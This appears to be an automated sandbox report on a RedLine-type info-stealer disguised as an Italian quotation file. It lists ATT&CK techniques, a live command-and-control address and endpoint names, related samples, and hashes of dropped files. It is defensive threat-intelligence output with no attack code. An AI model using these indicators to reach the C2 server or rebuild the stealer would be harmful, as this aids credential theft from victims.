                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf0c578.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf243c0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Preventivo#09678.exe.213dbf243c0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1432476685.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Preventivo#09678.exe PID: 5092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jsc.exe PID: 6936, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    311
                    Process Injection
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    341
                    Security Software Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    11
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                    Virtualization/Sandbox Evasion
                    Security Account Manager251
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets113
                    System Information Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Timestomp
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Preventivo#09678.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://193.70.111.186:13484t-0%Avira URL Cloudsafe
                    http://193.70.111.186:13484/0%Avira URL Cloudsafe
                    193.70.111.186:134840%Avira URL Cloudsafe
                    http://193.70.111.186:134840%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      193.70.111.186:13484true
                      • Avira URL Cloud: safe
                      unknown
                      http://193.70.111.186:13484/true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%Preventivo#09678.exe, 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, jsc.exe, 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/chrome_newtabjsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                          high
                          https://duckduckgo.com/ac/?q=jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                            high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icojsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                              high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousjsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Endpoint/CheckConnectResponsejsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.datacontract.org/2004/07/jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXjsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://193.70.111.186:13484jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000007.00000002.1432476685.00000000032BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://tempuri.org/Endpoint/EnvironmentSettingsjsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000007.00000002.1432476685.00000000031E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%jsc.exe, jsc.exe, 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/soap/envelope/jsc.exe, 00000007.00000002.1432476685.00000000031E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                                              high
                                              http://tempuri.org/jsc.exe, 00000007.00000002.1432476685.00000000032BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://upx.sf.netAmcache.hve.11.drfalse
                                                  high
                                                  http://tempuri.org/Endpoint/CheckConnectjsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                                                      high
                                                      http://193.70.111.186:13484t-jsc.exe, 00000007.00000002.1432476685.00000000032BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.ecosia.org/newtab/jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                                                        high
                                                        http://tempuri.org/Endpoint/VerifyUpdateResponsejsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://tempuri.org/Endpoint/SetEnvironmentjsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000007.00000002.1432476685.0000000003719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://tempuri.org/Endpoint/SetEnvironmentResponsejsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tempuri.org/Endpoint/GetUpdatesjsc.exe, 00000007.00000002.1432476685.00000000032BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org/autocomplete?q=jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                                                                  high
                                                                  https://api.ipify.orgcookies//settinString.Removegjsc.exe, jsc.exe, 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingjsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Endpoint/GetUpdatesResponsejsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchjsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                                                                          high
                                                                          http://tempuri.org/Endpoint/EnvironmentSettingsResponsejsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/Endpoint/VerifyUpdatejsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/0jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/soap/actor/nextjsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      193.70.111.186
                                                                                      unknownFrance
                                                                                      16276OVHFRtrue
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1555180
                                                                                      Start date and time:2024-11-13 15:01:26 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 5m 49s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:18
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:Preventivo#09678.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.expl.evad.winEXE@5/50@1/1
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 91%
                                                                                      • Number of executed functions: 61
                                                                                      • Number of non-executed functions: 1
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 104.26.12.31, 172.67.75.172, 104.26.13.31, 20.42.73.29
                                                                                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • VT rate limit hit for: Preventivo#09678.exe
                                                                                      TimeTypeDescription
                                                                                      09:02:33API Interceptor42x Sleep call for process: jsc.exe modified
                                                                                      10:04:50API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      193.70.111.186QUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                                                                      • 193.70.111.186:13484/
                                                                                      RFQ_TFS-1508-AL NASR ENGINEERING.exeGet hashmaliciousRedLineBrowse
                                                                                      • 193.70.111.186:13484/
                                                                                      QUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                                                                      • 193.70.111.186:13484/
                                                                                      COTIZACI#U00d3N#09678.exeGet hashmaliciousRedLineBrowse
                                                                                      • 193.70.111.186:13484/
                                                                                      No context
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      OVHFRSecurityHealthService.exeGet hashmaliciousAsyncRAT, DarkTortilla, XWormBrowse
                                                                                      • 213.32.110.214
                                                                                      meerkat.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                      • 144.2.61.131
                                                                                      QUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                                                                      • 193.70.111.186
                                                                                      x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                      • 51.195.88.199
                                                                                      neworigin.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 51.195.88.199
                                                                                      TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                      • 51.195.88.199
                                                                                      https://sharepoint-business.com/?rid=eprRhgrGet hashmaliciousUnknownBrowse
                                                                                      • 51.178.43.144
                                                                                      http://matomo.uk.oxa.cloudGet hashmaliciousUnknownBrowse
                                                                                      • 51.195.180.103
                                                                                      zgp.elfGet hashmaliciousMiraiBrowse
                                                                                      • 51.222.237.206
                                                                                      mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                                                      • 51.75.33.127
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.1383003010249666
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:7EBe6/Mplfi0OJRx4aWz3OlTw7ZF8OEzzuiFTZ24lO8K:ABe6/IlxOJRqa4oXdzuiFTY4lO8K
                                                                                      MD5:787594A7D09949518413BB37A755DE36
                                                                                      SHA1:205A5FA8653265850D97EB42DCAE18D897DAAFC5
                                                                                      SHA-256:27FBC52CCA2C29C29FC29D7E87FB4BE119F87B26E7B7298AF910EFF53042A2F3
                                                                                      SHA-512:5A607F9C4B749B91421AC1021A969F321CE0A1BD639E6FB261FD281988CA8818FD26DCA7AFA0362818F4EB5DFBFBD9A2BDA26E114744D8F74B016DBF3E9163C2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.8.0.1.4.5.3.6.2.9.2.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.8.0.1.4.6.0.9.7.2.9.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.4.4.c.9.9.d.-.f.a.f.4.-.4.6.2.c.-.8.4.6.b.-.e.2.0.8.0.a.1.d.8.1.8.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.6.7.0.2.d.6.-.d.d.0.c.-.4.b.1.3.-.8.5.7.d.-.5.f.3.1.9.8.a.3.6.6.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.P.r.e.v.e.n.t.i.v.o.#.0.9.6.7.8...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.K.o.s.t.a.n.a.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.e.4.-.0.0.0.1.-.0.0.1.4.-.b.4.3.c.-.1.7.a.6.d.4.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.4.a.a.9.a.f.6.a.2.3.5.3.7.6.b.1.4.8.6.c.5.4.5.b.b.c.f.4.9.2.e.0.0.0.0.0.0.0.0.!.0.0.0.0.e.b.0.9.e.3.4.e.3.5.e.0.6.d.4.f.e.e.5.f.0.1.b.f.5.7.1.2.4.a.8.0.c.0.e.6.1.9.1.7.!.P.r.e.v.e.
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 16 streams, Wed Nov 13 14:02:25 2024, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):519483
                                                                                      Entropy (8bit):3.8174559297825557
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:LfwnwDmBbNcEKaDLrZcyc2mqL6PrhsEYNw3Q:IbyKWyc2mqePrhscQ
                                                                                      MD5:94F7C3A4A8502BB3AC19E2004245097D
                                                                                      SHA1:306A9F4D88F8E77F97B15C8BB39EE4350F6A4CBF
                                                                                      SHA-256:CA4099FC04A6BC95A18DE19A416AC1EAE0722FBF0AC2F6C370A0B840216BE503
                                                                                      SHA-512:27A48978E53018FC961ED037065DB45F8B0091BC006A954CF4F3599785D5D451D9413ECA4E0DB36E5C2C19E033EF2481D3CEB39C5FAE5CE2255303736A8EED4C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:MDMP..a..... .......q.4g....................................$...........t ...........k...~..........l.......8...........T............-..+...........h@..........TB..............................................................................eJ.......B......Lw......................T...........i.4g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):9096
                                                                                      Entropy (8bit):3.7091634559409643
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJCMX8be6YN1BRIhgmfZgV6pr789bc+qfNRUm:R6lXJhB6Y/BR+gmfa5cLfN3
                                                                                      MD5:F205B6992106391AAD72DEEAFDD9EE9C
                                                                                      SHA1:5B471A94EB6A83017EED8D0AA4BE4A6A6619412C
                                                                                      SHA-256:5F247E74AF5AE7395DD5E57BEADFC5A6F10700BD26CFBF886FA367E3F8DBA9E8
                                                                                      SHA-512:C1161ED2F09261AE74210046A06221DC6BC7708D1B62F771001E3D8DFB6E1DBF01F7E6663EBF817E92892C5370FF38B06FD2D115F3E88D1071410E4F6006BC06
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.9.2.<./.P.i.
                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4847
                                                                                      Entropy (8bit):4.512413835536363
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsnJg771I9e4yWpW8VYNRkYm8M4JwN/E6FH1oyq8vN/E36n7Wd:uIjfJI7Rg7VARJweCoWe36n7Wd
                                                                                      MD5:19750C0D202B1784674A2635C2A9CAC7
                                                                                      SHA1:78802216BA6E5A74DFC7C2EBB5307CDB1D578516
                                                                                      SHA-256:FE639165CA5630D024E87FB24E71CA9284D27C758610D50F63A2D3627549DCF1
                                                                                      SHA-512:3840CDE48DA253EC39A3DFFF88FA7DB6C0CDF0E51620B0C85DB33BF21BA28AA70EA8AC35CB266D08C7A56DF5B7F5273B8EF38DB50DF2E39B0CFE47D843B7DE9E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586385" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2666
                                                                                      Entropy (8bit):5.345804351520589
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHt1qHxLHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JNV
                                                                                      MD5:90757169D333CB9247B01FB0CAF14023
                                                                                      SHA1:C47A0AA0CBC960527EA4FA7F61AC1D08B56C23A5
                                                                                      SHA-256:C04472992BF7CF58327D947D334F1105C14C5CF0D2DD0DF7E7873CAADE0EC61D
                                                                                      SHA-512:A49B90272EC353DE49C508AF75C509D14A18EA50ABD1CD49BF5313A708CB9654A543E3340C74978B5756A66EF291132E93931853CAD7CC8C85450BB64A318031
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
